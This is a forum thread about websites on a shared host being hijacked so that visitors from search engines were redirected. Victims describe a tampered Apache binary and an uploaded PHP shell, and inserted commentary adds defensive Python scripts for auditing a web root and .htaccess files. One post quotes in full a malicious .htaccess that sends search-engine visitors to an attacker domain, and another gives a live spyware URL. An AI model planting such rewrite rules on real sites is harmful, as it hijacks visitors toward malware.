Your web server is set up much in the same way, with whatever version of Apache they are using. The difference is that on your pc you'd get Apache to run in Windows, whereas on the actual server Apache runs in some version of Unix or Linux, with a lot more bells and whistles for sure.
Re: URL hijack? vivian416 2/13/09 9:16 AM
@wredefine

"Vivian - this may sound like a dumb question, but did your reseller account go to the same server as the single website you mentioned as being fixed?"
No. The reseller account went to a different server. What was more scary is after they migrated my reseller account to a different server the redirection was still there. So for about 2 weeks the hosting provider was convinced it was on our end that was causing the problem. And I was getting suspicious myself perhaps the problem was on our end also.

Then, I deleted the entire content of one of the websites just to see if it would behave differently. The redirection was still there and it would redirect to the hacked site every time instead of once every 3 times. The hosting provider was finally convinced and helped. Solution: They rewrote the new httpd binary and restarted Apache!

This whole fiasco was very scary. I am shell shocked now. As of now problems seemed to be fixed.

Thanks wredefine and everyone for trying to help.
Re: URL hijack? webado 2/13/09 9:27 AM
Good to hear that.
 
So we can assume it's the same hackers at work - or else you are coincidentally both hosted on the same server or server network.
Re: URL hijack? rudyh 2/13/09 10:11 AM
Good point webado! I am with HostforWeb, the Reno server. And you Vivian?
Re: URL hijack? vivian416 2/13/09 10:36 AM
Yes. I am on with Hostforweb also! My goodness.
Re: URL hijack? webado 2/13/09 11:11 AM
Hmmm.. at least it's not all over god's green acres. With luck (too late for you, you've already been stung, but for others) it may be contained on that network - hopefully eradicated by now.

Good luck from now on.
Re: URL hijack? rudyh 2/13/09 11:11 AM
Amazing, the world is a small place... The internet makes it the size of a computer-screen, not just with Google Maps :-)
Re: URL hijack? etheis 1/15/10 4:01 PM
Thank God for this page... I found it because my domains were being redirected from google links to the
same type of url, just a different domain:
http://hnwmwpy6   .in/index.php?src=199&surl=www.[DOMAIN].com&sport=80&suri=%2F
which gives a fake windows registry error with a download to what can only be spyware.
Only when I searched google for "&sport=80" did this page luckily come up, and it all sounded
too familiar.

Another clever thing these hackers are doing is if you revisit that above URL directly for a 2nd time, you are told
the host has closed down the account -- as you are led to believe it was shut down -- but I
thought to myself -- now what are the chances they shut it down right this second.

So after I checked my server conf files and .htaccess files (all clean) I knew it must be at the apache binary level.
I sent this thread to my dedicated server host and they said "I've rebuilt everything on the server including the kernel/world.  I've got a copy of the apache binary and a module that was also affected (I checked the MD5s) and they were indeed altered somehow.  The timestamps were not modified so I'll be going through the server logs to see if I can determine when and how this happened."

After running a Clam scan we found the following:
/usr/home/httpd/clients/[DOMAIN]/public_html/store/images/khgujp.php: PHP.Shell
FOUND

That file had 777 permissions and www ownership. It turns out that this
site, using Zen-Cart 1.3.7, was exploited: they got into the admin panel for it and
were able to upload that PHP file as a product image and change permissions on
it.

So make sure you do a full scan of your filesystem and look out for an exploit like this.

Another thing: last month I had a few users of my site report that randomly a link
they clicked on while at my site led them to a malicious site. I had up till now excluded
it from being my server (injection attack etc.) and assumed they must just have adware/malware
themselves that only triggers once in a blue moon. Anyone else experience redirects like this
in addition to google referred redirects?
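The two findings in the post above (a writable PHP file planted under an image-upload directory, and an Apache binary whose checksum no longer matched) are both things an administrator can check for routinely. The script below is an added example, not code from this thread or from any of the posters: it walks a web root for script files that are world-writable or live under an upload directory, and compares server binaries against a hash manifest recorded from a clean install. The web root, file names and "httpd" contents it builds in a temporary directory are constructed for the demonstration.

```python
"""Audit a web root for planted scripts and verify server binaries against a
known-good hash manifest. Added example; paths and contents are constructed."""
import hashlib
import os
import stat
import tempfile

SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5", ".pl", ".cgi"}
UPLOAD_DIR_NAMES = {"images", "uploads", "media"}  # directories that should hold data, not code


def sha256_of(path):
    """Hash a file in chunks so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_suspicious_scripts(webroot):
    """Return (relative_path, reason) for script files that are world-writable
    or that sit under a directory meant for uploaded images/media."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        rel_dir = os.path.relpath(dirpath, webroot)
        parts = [] if rel_dir == "." else rel_dir.split(os.sep)
        in_upload_dir = any(p.lower() in UPLOAD_DIR_NAMES for p in parts)
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.stat(full).st_mode)
            reasons = []
            if mode & stat.S_IWOTH:
                reasons.append("world-writable mode %o" % mode)
            if in_upload_dir:
                reasons.append("script inside an upload directory")
            if reasons:
                findings.append((os.path.relpath(full, webroot), "; ".join(reasons)))
    return sorted(findings)


def verify_manifest(manifest):
    """manifest maps absolute path -> SHA-256 recorded from a clean install.
    Returns the paths that are missing or whose hash has changed (the same
    check the host in the post did with MD5s)."""
    changed = []
    for path, expected in manifest.items():
        if not os.path.isfile(path) or sha256_of(path) != expected:
            changed.append(path)
    return sorted(changed)


def _write(path, content, mode):
    with open(path, "w") as f:
        f.write(content)
    os.chmod(path, mode)


def demo():
    """Build a constructed web root in a temp directory and run both checks."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "store", "images"))
    os.makedirs(os.path.join(root, "bin"))
    # Legitimate page with ordinary permissions: must not be reported.
    _write(os.path.join(root, "index.php"), "<?php echo 'ok'; ?>\n", 0o644)
    # Stand-in for the file clamav reported: a .php under an image directory, mode 777.
    _write(os.path.join(root, "store", "images", "khgujp.php"),
           "<?php /* constructed placeholder for the uploaded shell */ ?>\n", 0o777)
    # Fake httpd binary: record its hash, confirm it verifies, then overwrite it
    # to simulate the tampering described in the post.
    httpd = os.path.join(root, "bin", "httpd")
    _write(httpd, "original httpd build\n", 0o755)
    manifest = {httpd: sha256_of(httpd)}
    before = verify_manifest(manifest)
    _write(httpd, "tampered httpd build\n", 0o755)
    return {
        "scripts": find_suspicious_scripts(root),
        "changed_before_tamper": before,
        "changed_after_tamper": verify_manifest(manifest),
        "httpd_path": httpd,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The manifest only helps if it was recorded before the compromise and stored off the server, since an attacker who can replace httpd can also edit a hash list sitting next to it; package-manager verification (for example the distribution's own integrity check of installed packages) is the usual source of a trustworthy baseline.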
Re: URL hijack? Driscoll 1/18/10 8:46 AM
Thanks for all the Help. I was sure google was hacked, as only search was hijacked, not a directly entered URL.
Meaning they didn't re-direct my DNS, only the searches... They did it with a .htaccess[1] file in my web site's root.
Contents were...
#  HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ http://earth-stat.ru/ [R=301,L]

ErrorDocument 401 http://earth-stat.ru/
ErrorDocument 403 http://earth-stat.ru/
ErrorDocument 404 http://earth-stat.ru/
ErrorDocument 500 http://earth-stat.ru/
#  /HostRule
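The rule set quoted above has a recognisable shape: a run of RewriteCond lines testing HTTP_REFERER for search-engine names, a RewriteRule that sends the visitor to another host, and ErrorDocument directives pointing off-site (Apache treats a full URL there as an external redirect). Because the redirect only fires for search-engine referrers, the site owner visiting directly never sees it, which is exactly what the poster observed. The following audit script is an added example, not the poster's code: it parses .htaccess text and reports that pattern. The sample it scans is a shortened copy of the quoted rules with the redirect target replaced by the placeholder host redirect-target.example and one harmless internal rule appended as a negative case.

```python
"""Flag referrer-conditional redirects and off-site ErrorDocuments in .htaccess
text. Added example; the sample below is constructed from the quoted rules."""
from urllib.parse import urlparse

SEARCH_ENGINE_WORDS = ("google", "yahoo", "bing", "msn", "ask", "yandex",
                       "aol", "lycos", "rambler", "search")

# Constructed sample: abbreviated from the thread, target host is a placeholder.
SAMPLE_HTACCESS = """\
#  HostRule
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule ^(.*)$ http://redirect-target.example/ [R=301,L]

ErrorDocument 404 http://redirect-target.example/
#  /HostRule
# legitimate rule kept by the site owner: same-site redirect, must not be flagged
RewriteRule ^old/(.*)$ /new/$1 [R=301,L]
"""


def _external_host(target, site_host):
    """Return the hostname of target if it points at a host other than the site."""
    host = urlparse(target).hostname
    if host and host.lower() != site_host.lower():
        return host
    return None


def audit_htaccess(text, site_host):
    """Return a list of finding dicts, one per suspicious directive.

    RewriteCond lines accumulate until the next RewriteRule consumes them, which
    mirrors how mod_rewrite applies conditions."""
    findings = []
    pending = []  # (line_no, engine_name_or_None) for HTTP_REFERER conditions
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            if parts[1].upper() == "%{HTTP_REFERER}":
                pattern = parts[2].lower()
                engine = next((w for w in SEARCH_ENGINE_WORDS if w in pattern), None)
                pending.append((n, engine))
        elif directive == "rewriterule" and len(parts) >= 3:
            host = _external_host(parts[2], site_host)
            if host:
                kind = ("referrer-conditional external redirect" if pending
                        else "external redirect")
                findings.append({
                    "line": n,
                    "kind": kind,
                    "target": parts[2],
                    "cond_lines": [ln for ln, _ in pending],
                    "engines": [e for _, e in pending if e],
                })
            pending = []
        elif directive == "errordocument" and len(parts) >= 3:
            host = _external_host(parts[2], site_host)
            if host:
                findings.append({"line": n, "kind": "external ErrorDocument",
                                 "target": parts[2], "cond_lines": [], "engines": []})
    return findings


if __name__ == "__main__":
    for f in audit_htaccess(SAMPLE_HTACCESS, "www.example.com"):
        print("line %d: %s -> %s (conditions on lines %s, engines %s)"
              % (f["line"], f["kind"], f["target"], f["cond_lines"], f["engines"]))
```

Run it over every .htaccess under the document root (and over the main server config, since the same directives are valid there) after a cleanup; a second copy of the rules in a subdirectory or in httpd.conf is a common reason the redirect "comes back".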